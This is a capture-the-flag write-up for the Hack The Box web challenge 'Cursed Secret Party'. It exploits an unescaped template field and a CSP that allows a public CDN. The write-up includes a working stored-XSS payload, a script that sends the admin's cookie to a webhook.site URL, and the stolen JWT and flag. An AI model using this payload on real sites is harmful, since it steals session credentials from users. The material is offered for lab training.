access: http://64.227.41.40:30155/
please try to submit.

code review:
router.get('/admin', AuthMiddleware, (req, res) => {
    if (req.user.user_role !== 'admin') {
        return res.status(401).send(response('Unautorized!'));
    }

    return db.get_party_requests()
        .then((data) => {
            res.render('admin.html', { requests: data });
        });
});

bot always visit /admin

<div class="card">
<div class="card-header"> <strong>Halloween Name</strong> : {{ request.halloween_name | safe }} </div>
<div class="card-body">

take attention:
app.use(function (req, res, next) {
    res.setHeader(
        "Content-Security-Policy",
        "script-src 'self' https://cdn.jsdelivr.net ; style-src 'self' https://fonts.googleapis.com; img-src 'self'; font-src 'self' https://fonts.gstatic.com; child-src 'self'; frame-src 'self'; worker-src 'self'; frame-ancestors 'self'; form-action 'self'; base-uri 'self'; manifest-src 'self'"
    );
    next();
});

we can put our evil.js from github to this site: 
https://cdn.jsdelivr.net 

please register to webhook.site:
https://webhook.site/#!/90f3b677-b980-40da-8463-5494f07066ea/2adeb511-06cc-402d-a848-b8cd2a8bed15/1
and put to our evil.script 

access: https://github.com/daviddonikapanjaitan/evil-jsdelivr
our code:
var xhttp = new XMLHttpRequest();
xhttp.open('GET', 'https://webhook.site/90f3b677-b980-40da-8463-5494f07066ea/?' + document.cookie, true);
xhttp.send();

access: https://cdn.jsdelivr.net/gh/daviddonikapanjaitan/evil-jsdelivr@master/evil.js
let's put our script to request payload:
POST /api/submit HTTP/1.1
Host: 64.227.41.40:30155
Content-Length: 231
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36
Content-Type: application/json
Accept: */*
Origin: http://64.227.41.40:30155
Referer: http://64.227.41.40:30155/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{

    "halloween_name": "<script src=\"https://cdn.jsdelivr.net/gh/daviddonikapanjaitan/evil-jsdelivr@master/evil.js\"></script>",
    "email": "test@live.com",
    "costume_type": "monster",
    "trick_or_treat": "tricks"
}

bot will send request to out xss script:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwidXNlcl9yb2xlIjoiYWRtaW4iLCJmbGFnIjoiSFRCe2Qwbid0XzRsbDB3X2Nkbl8xbl9jNXAhIX0iLCJpYXQiOjE2ODg4NjAxOTd9.mX-qcND7eIKV_aGWrsa_2t_xZKXA5r02vhbYiYtnyaM
please decode base64
 {"alg":"HS256","typ":"JWT"}.{"username":"admin","user_role":"admin","flag":"HTB{d0n't_4ll0w_cdn_1n_c5p!!}","iat":1688855451}.Øø¢!zpT-áîçÃ$ßºE /·ypKß£]HX0

flag: HTB{d0n't_4ll0w_cdn_1n_c5p!!}

resource:
https://mukarramkhalid.com/hack-the-box-hack-the-boo-writeups/#web---cursed-secret-party
